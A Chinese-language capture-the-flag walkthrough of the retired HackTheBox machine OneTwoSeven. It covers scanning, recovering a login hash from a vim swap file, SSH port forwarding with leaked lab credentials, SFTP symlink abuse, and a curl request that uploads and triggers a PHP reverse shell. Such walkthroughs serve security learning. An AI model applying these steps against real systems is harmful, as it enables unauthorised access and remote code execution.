本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.133
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.133 -o ./OneTwoSeven-autorecon
根据扫描结果就开放了两个可用的端口22,80我们直接看80端口
把里面的页面都点击了一把
发现上面的账号和密码,并且有个超链接”here“ 提示是使用域名和sftp协议进行访问,访问看看
再浏览器访问
看到可疑文件,.login.php.swp将其下载下来
wget http://onetwoseven.htb/~ots-yZjFkZWY/root/var/www/html-admin/.login.php.swp
下载到本地之后直接打开swp的文件是乱码,可直接vim login.php 然后会出现选项,选择R进行恢复即可查看内容文件,然后保存,当然也可以使用strings进行查看,最终得到如下内容
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($ _POST['password'])) { if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') { $_SESSION['username'] = 'ots-admin'; header("Location: /menu.php"); } else { $msg = 'Wrong username or password.';
得到上面的加密hash进行解密,通过somd5查找出来了加密的hash密码
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8 ots-admin Homesweethome1
我们在回到上面刚开始访问的首页信息,再nmap的全端口扫描,综合判断存在60080端口只允许本地访问
根据上面得到的账号和密码使用ssh进行端口转发将限制的端口转发到本地kali中
Username: ots-yZjFkZWY
Password: 122f1def
ssh -N -L 60080:127.0.0.1:60080 ots-yZjFkZWY@10.10.10.133
成功之后直接通过localhost访问60080端口,使用上面破解出来的的hash密码
又发现了一串账户名和密码通过sftp登录上去,同样创建软连接,再web访问
sftp ots-yODc2NGQ@onetwoseven.htb
同样通过symlink 配置连接文件
symlink /var/www/html/signup.php public_html/signup.txt
此处便发现了user.txt将其下载下来并读取,完成之后上面的登录界面下面有一个上传功能
上传功能做了一些安全限制,使用上面的sftp登录进去创建软连接,再web访问文件, 读取了限制的规则,可参考:RewriteRule Flags - Apache HTTP Server Version 2.4 我这里没有测试成功,不知道为啥,大家可以多测试测试,最终通过下面的方式提交请求上传反弹shell代码
curl -H 'Cookie: PHPSESSID=pe7ckkejqtn5bofpbqp249tmv3' -H 'Host: onetwoseven.htb' --form 'addon=@/home/kali/Downloads/htb/onetwoseven/bmfxshell.php' 'http://127.0.0.1:60080/addon-download.php?addon=/addon-upload.php' -vvv
访问反弹代码反弹shell
curl http://localhost:60080/addons/bmfxshell.php
拿到shell权限,顺手执行sudo -l
发现可以通过apt-get进行的参数update ,upgrade进行提权,我这里测试了好几次没成功,先放着,大家可以参考下面链接进行测试
https://0xdf.gitlab.io/2019/08/31/htb-onetwoseven.html https://hipotermia.pw/htb/onetwoseven